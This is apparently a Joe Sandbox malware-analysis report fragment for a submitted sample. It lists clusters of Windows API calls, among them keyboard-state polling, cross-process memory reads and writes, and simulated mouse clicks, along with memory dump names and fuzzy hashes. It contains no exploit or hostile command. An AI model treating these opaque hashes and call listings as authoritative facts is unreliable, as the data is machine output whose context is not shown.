• API ID: PrivateProfile$SectionWrite$String$__itow
• String ID:
• API String ID: 3440945829-0
• Opcode ID: c32fbc7fb0429057e6dd46e1c87049bdcb08f8d3b726ba39a9b430dfd9cb5132
• Instruction ID: ccc1f07647b1842890ab9ef5345c437e460f3662f9d6294d0e712a31b6acab9e
• Opcode Fuzzy Hash: c32fbc7fb0429057e6dd46e1c87049bdcb08f8d3b726ba39a9b430dfd9cb5132
• Instruction Fuzzy Hash: 73510735A001099FCF01EF68C981AAEBBF5FF09314B1880A9E959EB361DB35ED11DB51
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9015662da232b0791bc3c28e8d39c1d8ddd1f634e1330bfabd6239ee2b605e39
• Instruction ID: acc17c208e535380b75d6e09396aba6de2fbfcc504cec295b7d8f2b8bb17fb48
• Opcode Fuzzy Hash: 9015662da232b0791bc3c28e8d39c1d8ddd1f634e1330bfabd6239ee2b605e39
• Instruction Fuzzy Hash: 3C41B335B0E20CBFD711DB28CC58FE9BBA8EB09320F154565F916A72E1C730AD81EA51
APIs
• GetCursorPos.USER32(?), ref: 00892357
• ScreenToClient.USER32(009557B0,?), ref: 00892374
• GetAsyncKeyState.USER32(00000001), ref: 00892399
• GetAsyncKeyState.USER32(00000002), ref: 008923A7
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: a13f8d6af41a6cadf854d1aa276b151f7dc95edd6ab8d0cbe6b4db588d2bc027
• Instruction ID: 93e1913bf739b8d47524db3198393bfe6863fcd075a0c96c006ae91a72bb3900
• Opcode Fuzzy Hash: a13f8d6af41a6cadf854d1aa276b151f7dc95edd6ab8d0cbe6b4db588d2bc027
• Instruction Fuzzy Hash: DB418F35A08509FBCF159F68C844FE9BB74FB05364F24431AF828D22A0CB349990EB91
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E63E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 008E6433
• TranslateMessage.USER32(?), ref: 008E645C
• DispatchMessageW.USER32(?), ref: 008E6466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E6475
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: a2667abb6e21d74c1934a7dd882839629aa0201ce03e8ad5a2a12e1125a41f2e
• Instruction ID: cd3094f2413da90579bfbfe3af98686d0b143dc84cd7a0e5f85649e8be97ac04
• Opcode Fuzzy Hash: a2667abb6e21d74c1934a7dd882839629aa0201ce03e8ad5a2a12e1125a41f2e
• Instruction Fuzzy Hash: F031063161478AAFDB20CFB2CC54BF67BA8FB22389F144165E421C21A2F7359454E760
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008C7AEF
• _memset.LIBCMT ref: 008C7B1A
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 008C7B77
• GetLastError.KERNEL32(?,?,00000000,?,?), ref: 008C7B93
• _memset.LIBCMT ref: 008C7BA9
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide
• String ID:
• API String ID: 742067911-0
• Opcode ID: e454a6b51e0b3b38558e891410aba1986b076e79e9414e9c836557852b13fe80
• Instruction ID: 6bf5b1c85034403f22456aceeeeb64b15a266bd2a03c06cc0bd8bbe6505ad039
• Opcode Fuzzy Hash: e454a6b51e0b3b38558e891410aba1986b076e79e9414e9c836557852b13fe80
• Instruction Fuzzy Hash: D331AB31608219AACB21AF589845FEE7B78FF42770F4441ADF824DB291DA30CD40CBA2
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 008E8A30
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 008E8ADA
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008E8AE2
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 008E8AF0
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008E8AF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _write_multi_char$_free_write_string
                                                                        • String ID:
                                                                        • API String ID: 687207756-0
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 008EB204
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008EB221
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008EB259
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008EB27F
                                                                        • _wcsstr.LIBCMT ref: 008EB289
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091B192
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0091B1B7
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0091B1CF
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0091B1F8
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00900E90,00000000), ref: 0091B216
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E9320
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E9352
                                                                        • __itow.LIBCMT ref: 008E936A
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E9392
                                                                        • __itow.LIBCMT ref: 008E93A3
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow$_memmove
                                                                        • String ID:
                                                                        • API String ID: 2983881199-0
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00905A6E
                                                                        • GetForegroundWindow.USER32 ref: 00905A85
                                                                        • GetDC.USER32(00000000), ref: 00905AC1
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00905ACD
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00905B08
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0089134D
                                                                        • SelectObject.GDI32(?,00000000), ref: 0089135C
                                                                        • BeginPath.GDI32(?), ref: 00891373
                                                                        • SelectObject.GDI32(?,00000000), ref: 0089139C
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008F4ABA
                                                                        • __beginthreadex.LIBCMT ref: 008F4AD8
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 008F4AED
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008F4B03
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008F4B0A
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                        • String ID:
                                                                        • API String ID: 3824534824-0
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E821E
                                                                        • GetLastError.KERNEL32(?,008E7CE2,?,?,?), ref: 008E8228
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,008E7CE2,?,?,?), ref: 008E8237
                                                                        • HeapAlloc.KERNEL32(00000000,?,008E7CE2,?,?,?), ref: 008E823E
                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E8255
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?,?,008E7455), ref: 008E7127
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7142
                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7150
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?), ref: 008E7160
                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E716C
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5276
• QueryPerformanceCounter.KERNEL32(00955310,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5280
• Sleep.KERNEL32(000000FA,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F52BC
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: a3821aa8c8dadee86324c32e249854240ab0db13f725c38eb406fcc29d2f4f31
• Instruction ID: 2531e387050ae082b54d24e22260e653f60e4d1a1d9e0e3129b1eee96de5f51e
• Opcode Fuzzy Hash: a3821aa8c8dadee86324c32e249854240ab0db13f725c38eb406fcc29d2f4f31
• Instruction Fuzzy Hash: 69013531E19A1DEBCF00AFB4E859AEDBB78FB08711F414256EA41F2240CB309550DBA1
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E8121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8157
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 0f8f43cad911dd91d06ff9900c6061cc7882967bbf396d6f9f1cac3bb5eceec3
• Instruction ID: 8493a92472a8246c0efa2c63739d438c7c55e40d06aefe3ef22037da21ee1114
• Opcode Fuzzy Hash: 0f8f43cad911dd91d06ff9900c6061cc7882967bbf396d6f9f1cac3bb5eceec3
• Instruction Fuzzy Hash: 91F06275354308FFEB120FA5EC98EAB3BACFF4A754B004125F959C6150CB619D42EA60
APIs
• GetDlgItem.USER32(?,000003E9), ref: 008EC1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 008EC20E
• MessageBeep.USER32(00000000), ref: 008EC226
• KillTimer.USER32(?,0000040A), ref: 008EC242
• EndDialog.USER32(?,00000001), ref: 008EC25C
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 5b74de830594cc04be2f0889f037c19d1122ae982774269e2fb675ca80678d96
• Instruction ID: b1147d8927956b0d8e6a62ae754831bfd6d29f107db3fa19c022ca213b9db6f6
• Opcode Fuzzy Hash: 5b74de830594cc04be2f0889f037c19d1122ae982774269e2fb675ca80678d96
• Instruction Fuzzy Hash: 9001F230A1870CABEB205B64EC4EB9677B8FB01B06F004269A652E00E0CBE06844DB80
APIs
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: b4d7a421ec43d5cd598f8b5cad73c1095ed6c68f4ef274a8b2cb46987794fe83
• Instruction ID: aedffa658010230aef5447e9f124f0a197a72163bc0e9f3d40d60be4449667eb
• Opcode Fuzzy Hash: b4d7a421ec43d5cd598f8b5cad73c1095ed6c68f4ef274a8b2cb46987794fe83
• Instruction Fuzzy Hash: F8F0F63012CB09ABDF11AF26EC6C7983BA5F725326F09C224E52A881B2C7354995EF10
APIs
  • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
• CoInitialize.OLE32(00000000), ref: 008FB9BB
• CoCreateInstance.OLE32(00922D6C,00000000,00000001,00922BDC,?), ref: 008FB9D4
• CoUninitialize.OLE32 ref: 008FB9F1
  • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow
• String ID: .lnk
• API String ID: 3831848471-24824748
• Opcode ID: 24a8363cc8d6529da52d3ca6b165579f7eb78e27cc80c0e3693b548b59d323d2
• Instruction ID: dc300ff8e6e7aae89bd8197d3b9eec101471bf27b6db8753dac3aa591a35f77e
• Opcode Fuzzy Hash: 24a8363cc8d6529da52d3ca6b165579f7eb78e27cc80c0e3693b548b59d323d2
• Instruction Fuzzy Hash: 49A135756042059FCB00EF28C884D6ABBE5FF89324F148998F999DB261DB31EC45CB92
APIs
• __startOneArgErrorHandling.LIBCMT ref: 008B50AD
  • Part of subcall function 008C00F0: __87except.LIBCMT ref: 008C012B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 9b1403537a9df33ae898950974b9d6c2f0477274ad09046b7f53969e101b51da
• Instruction ID: f82482977fd4fca523d46f704c7061415392551b0d697e99db627702dcc28aea
• Opcode Fuzzy Hash: 9b1403537a9df33ae898950974b9d6c2f0477274ad09046b7f53969e101b51da
• Instruction Fuzzy Hash: F1515E6191CA05C6D722B72CC8057BE7BA4FB40780F248D5EE4D5C6399DE34CDC5AE82
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: 5514cec330b28907040de7aa4f5cb3b80f69f8f84d616a87281a087acc054634
• Instruction ID: 969c35f188a4d52e02f5d06787989198bfe0f2c4823618a1c8c8a5e4f70fa90b
• Opcode Fuzzy Hash: 5514cec330b28907040de7aa4f5cb3b80f69f8f84d616a87281a087acc054634
• Instruction Fuzzy Hash: CA51B170A00309DBEB24CF65C841BABB7E4FF05314F24496EE84ACB655E770EA54CB50
APIs
  • Part of subcall function 008F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E9296,?,?,00000034,00000800,?,00000034), ref: 008F14E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008E983F
  • Part of subcall function 008F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008F14B1
  • Part of subcall function 008F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008F1409
  • Part of subcall function 008F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008E925A,00000034,?,?,00001004,00000000,00000000), ref: 008F1419
  • Part of subcall function 008F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008E925A,00000034,?,?,00001004,00000000,00000000), ref: 008F142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E98AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E98F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 3100d0a872f765f03b1c8e314bbf807816bd16dff6e8547f8cc3158c1fa0d5d3
• Instruction ID: a59b24fc9285f88efc5f3b18add1266c6d5c0eebbbe686ab742f503298033067
• Opcode Fuzzy Hash: 3100d0a872f765f03b1c8e314bbf807816bd16dff6e8547f8cc3158c1fa0d5d3
• Instruction Fuzzy Hash: BD413076A0021CAFDF10DFA4CC45AEEBBB8FB45300F104159FA55B7151DA716E45CBA1
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0091F910,00000000,?,?,?,?), ref: 009179DF
• GetWindowLongW.USER32 ref: 009179FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00917A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: a232c25ed71abbc995488ab28d651ea5b4852ffa60b851726ec6c25b5b05b8db
• Instruction ID: 1b4b5f93a3c9af96492916284ecb6cc62f95ed1a267e4db5d2ea4c23b0ebef6d
• Opcode Fuzzy Hash: a232c25ed71abbc995488ab28d651ea5b4852ffa60b851726ec6c25b5b05b8db
• Instruction Fuzzy Hash: 6931CE3120820AABDF119E78CC45BEAB7A9FF49334F244725F875D22E0D730E9919B50
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00917461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00917475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00917499
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: e3fe9876c1a2d30e22cf8b6fad818180d72d18f9ccfefe3c997b0ac8e3ba1eb3
• Instruction ID: f20628da460a4272dfc2966c9c3f07800cb2fe6ffa80792bfeb7fd8e87f37d5e
• Opcode Fuzzy Hash: e3fe9876c1a2d30e22cf8b6fad818180d72d18f9ccfefe3c997b0ac8e3ba1eb3
• Instruction Fuzzy Hash: EA21943261421DABDF11CF94CC46FEA7B7AEB48724F110114FE156B1E0D675AC91DB90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00917C4A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00917C58
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00917C5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
